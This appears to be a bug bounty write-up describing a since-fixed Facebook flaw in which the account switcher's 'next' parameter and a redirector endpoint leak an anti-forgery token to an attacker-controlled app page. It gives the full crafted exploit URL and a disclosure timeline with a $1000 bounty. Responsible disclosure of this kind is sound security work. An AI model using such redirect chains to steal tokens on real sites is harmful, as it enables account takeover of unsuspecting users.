Stealing Side-Channel Attack Tokens in Facebook Account Switcher

After receiving an email from facebook that somebody requested to join my group I decided to open the link in a different account to see the results. I was brought to the “account switcher” page that looks like this.

Upon hitting continue it would normally log you out and prompt you to log in on the new account. But in the url for the account switcher there was a next paramater controlling where to go after hitting continue. On top of being able to control where the request goes, it also appends a fb_dtsg_ag token (the token used to prevent side-channel attacks on facebook).

The next task was to somehow find a a way to steal the tokens once the user hits continue. My main goal was to get the token to redirect to apps.facebook.com where I could harvest the token using an embedded iframe to pull the data from the url. The only problem was the next paramater didn’t support subdomains so it could only redirect to https://www.facebook.com/. Luckily enough facebook has an endpoint https://www.facebook.com/n/? where you can put any facebook domain after the ? and it will redirect. After a little bit of url encoding the final URL looked like this

https://www.facebook.com/notif_account_switching/&next=https%3A%2F%2Fwww.facebook.com%2Fn%2F%3Fhttps%253A%252F%252Fapps.facebook.com%252FAPPTOSTEALTOKENS%252523

I clicked continue, and then checked my websites log file to see this

Success!

Timeline

Submitted- December 7th, 2018

Triaged- December 10th, 2018

Team Asks for Verification on fix- January 3rd, 2019

Bounty Awarded($1000)- January 4th, 2019